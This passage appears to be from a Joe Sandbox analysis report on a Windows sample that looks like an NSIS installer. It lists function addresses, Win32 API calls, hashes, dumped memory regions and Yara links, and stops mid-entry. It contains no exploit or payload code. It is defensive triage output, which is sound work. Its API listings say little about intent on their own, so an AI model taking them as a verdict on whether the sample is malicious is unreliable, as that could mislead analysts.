Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 9ce5220da9ed3c49ab8c05536da5923326b58a2142fda2ae973167115508ceb5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: 2DE08632140259ABCF119E518C00AEB376CFB05350F018472F911E2240D630E82187A5

Uniqueness

Uniqueness Score: -1.00%

Function 004060BC Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403475,00000000,00793700,000000FF,00793700,000000FF,000000FF,00000004,00000000), ref: 004060D0

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: ff7f98053b8daf8dc00d9e724bd7773b369301681fd057c4f0a19a08aea0fefc
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: AEE0EC3225426AABDF10AF659C00AEB7BACFB15360F018437FA56E3190D631E83197A4

Uniqueness

Uniqueness Score: -1.00%

Function 00405B40 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00405B4F

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29

Uniqueness

Uniqueness Score: -1.00%

Function 004034C2 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040385A,?), ref: 004034D0

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00403AEF Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403A3B,?), ref: 00403AFA

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 22253138ce9d688b3f17daec7edef24fdb7bdc72d87b37ed95829791f1385de5
Instruction ID: be966910c112319e13f3474517542a813bf40e0eb25e6fd9a20f15f2fd6a5ca7
Opcode Fuzzy Hash: 22253138ce9d688b3f17daec7edef24fdb7bdc72d87b37ed95829791f1385de5
Instruction Fuzzy Hash: D5C0127050470456D1607F759E4FE553E645B40339B504725B0F9B00F1CB3C6699855D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004056BB Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405719
GetDlgItem.USER32(?,000003EE), ref: 00405728
GetClientRect.USER32(?,?), ref: 00405765
GetSystemMetrics.USER32(00000002), ref: 0040576C
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040578D
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040579E
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057B1
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057BF
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057D2
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057F4
ShowWindow.USER32(?,00000008), ref: 00405808
GetDlgItem.USER32(?,000003EC), ref: 00405829
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405839
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405852
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040585E
GetDlgItem.USER32(?,000003F8), ref: 00405737

Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9

GetDlgItem.USER32(?,000003EC), ref: 0040587B
CreateThread.KERNEL32(00000000,00000000,Function_0000564F,00000000), ref: 00405889
CloseHandle.KERNEL32(00000000), ref: 00405890
ShowWindow.USER32(00000000), ref: 004058B4
ShowWindow.USER32(?,00000008), ref: 004058B9
ShowWindow.USER32(00000008), ref: 00405903
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405937
CreatePopupMenu.USER32 ref: 00405948
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040595C
GetWindowRect.USER32(?,?), ref: 0040597C
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405995
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059CD
OpenClipboard.USER32(00000000), ref: 004059DD
EmptyClipboard.USER32 ref: 004059E3
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059EF
GlobalLock.KERNEL32(00000000), ref: 004059F9
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0D
GlobalUnlock.KERNEL32(00000000), ref: 00405A2D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A38
CloseClipboard.USER32 ref: 00405A3E

Strings

{, xrefs: 00405921

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 03cf949efa33a50c7b71d7009e7ac7f0f710837cb8ab8d2d50aa17df60b966e9
Instruction ID: d7cac64708ae36737aaf404740c8a4e4a0ccfdbfd79e04772bb75515dd65aeb5
Opcode Fuzzy Hash: 03cf949efa33a50c7b71d7009e7ac7f0f710837cb8ab8d2d50aa17df60b966e9
Instruction Fuzzy Hash: BFB14BB1900608FFDF11AF64DD89AAE7B79FB48354F00802AFA41B61A0CB795A51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404967 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049B6
SetWindowTextW.USER32(00000000,?), ref: 004049E0
SHBrowseForFolderW.SHELL32(?), ref: 00404A91
CoTaskMemFree.OLE32(00000000), ref: 00404A9C
lstrcmpiW.KERNEL32(open cmd,007A1F48,00000000,?,?), ref: 00404ACE
lstrcatW.KERNEL32(?,open cmd), ref: 00404ADA
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AEC

Part of subcall function 00405B5E: GetDlgItemTextW.USER32(?,?,00000400,00404B23), ref: 00405B71

Part of subcall function 004067A1: CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406804
Part of subcall function 004067A1: CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406813
Part of subcall function 004067A1: CharNextW.USER32(?,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406818
Part of subcall function 004067A1: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 0040682B

GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404BAF
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BCA

Part of subcall function 00404D23: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
Part of subcall function 00404D23: wsprintfW.USER32 ref: 00404DCD
Part of subcall function 00404D23: SetDlgItemTextW.USER32(?,007A1F48), ref: 00404DE0

Strings

open cmd, xrefs: 00404AC8, 00404ACD, 00404AD8
A, xrefs: 00404A8A

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$open cmd
API String ID: 2624150263-2790819922
Opcode ID: 43370ad54982c8dc28cc1873a7eafa11ef240cc5c4e1ff012c87e88bf0d14c6b
Instruction ID: 86dd0b9b094f85dab2cef093751cf510b28304c980c81074e8bd76ad65710a38
Opcode Fuzzy Hash: 43370ad54982c8dc28cc1873a7eafa11ef240cc5c4e1ff012c87e88bf0d14c6b
Instruction Fuzzy Hash: 4DA190B1901208ABDB11EFA5CD45AEF77B8EF84314F11803BF601B62D1DB7C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405C26 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405C4F
lstrcatW.KERNEL32(007A3F50,\*.*), ref: 00405C97
lstrcatW.KERNEL32(?,0040A014), ref: 00405CBA
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405CC0
FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405CD0
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D70
FindClose.KERNEL32(00000000), ref: 00405D7F

Strings

., xrefs: 00405CE1
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405C33
P?z, xrefs: 00405C7F
., xrefs: 00405CF5
\*.*, xrefs: 00405C91

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user~1\AppData\Local\Temp\$P?z$\*.*
API String ID: 2035342205-917880618
Opcode ID: 814ced211d4ca8f05d8f3c88103f298c287939ceba757f4f6ee6bf0cfa06a098
Instruction ID: 717efa72a3eb519caeee53ac910e89dbb8479b941b5c6030fce336447c755aae
Opcode Fuzzy Hash: 814ced211d4ca8f05d8f3c88103f298c287939ceba757f4f6ee6bf0cfa06a098
Instruction Fuzzy Hash: C341B230800A14BADB21AB659D8DAAF7778DF85718F24813FF401751D1D77C4A82DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00402269

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
API String ID: 542301482-3291747264
Opcode ID: 1811bc25c9a4c8aebb4cdb7ef2826e2c2a25f9d2a9cfe56534a608318fa0e58a
Instruction ID: 703d758d197f09623ff28e3c758b152e072eb06d6e5445e6f92684eec68365f7
Opcode Fuzzy Hash: 1811bc25c9a4c8aebb4cdb7ef2826e2c2a25f9d2a9cfe56534a608318fa0e58a
Instruction Fuzzy Hash: 47412571A00209EFCF40DFE4C989E9D7BB5BF49344B2045AAF505EB2D1DB799981CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00406850 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(771B3420,007A4F98,007A4750,00405F3A,007A4750,007A4750,00000000,007A4750,007A4750,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C46,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 0040685B
FindClose.KERNEL32(00000000), ref: 00406867

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
Instruction ID: 4aa2ce40dd0fdaaf15299f79bbf0ddad0ee07bd1ec444a92f9406ee76b8f93c8
Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
Instruction Fuzzy Hash: 3CD012365592205FC7402779AE0CC4B7A689F563313268B36B0EAF11F0CA74CC3296ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6fe8bad3e4f445c36a954bdba87cd56b1d6253f4c6ae1ca58158b1ff26ba5557
Instruction ID: 12288428410ef0014967daf25a5ca188ca533e908051b72e28feae2455f0dfde
Opcode Fuzzy Hash: 6fe8bad3e4f445c36a954bdba87cd56b1d6253f4c6ae1ca58158b1ff26ba5557
Instruction Fuzzy Hash: A6F05E71904114EED701DBA4D949AAEB378EF55318F20857BE101F21D0EBB88E119B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404EE3 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404EFB
GetDlgItem.USER32(?,00000408), ref: 00404F06
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F50
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F67
SetWindowLongW.USER32(?,000000FC,004054F0), ref: 00404F80
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F94
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FA6
SendMessageW.USER32(?,00001109,00000002), ref: 00404FBC
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FC8
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FDA
DeleteObject.GDI32(00000000), ref: 00404FDD
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405008
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405014
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050AF
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050DF

Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9

SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F3
GetWindowLongW.USER32(?,000000F0), ref: 00405121
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040512F
ShowWindow.USER32(?,00000005), ref: 0040513F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040523A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040529F
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052B4
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052D8
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052F8
ImageList_Destroy.COMCTL32(?), ref: 0040530D
GlobalFree.KERNEL32(?), ref: 0040531D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405396
SendMessageW.USER32(?,00001102,?,?), ref: 0040543F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040544E
InvalidateRect.USER32(?,00000000,00000001), ref: 00405479
ShowWindow.USER32(?,00000000), ref: 004054C7
GetDlgItem.USER32(?,000003FE), ref: 004054D2
ShowWindow.USER32(00000000), ref: 004054D9

Strings

M, xrefs: 00405097
N, xrefs: 00405178
, xrefs: 004054B1

Memory Dump Source

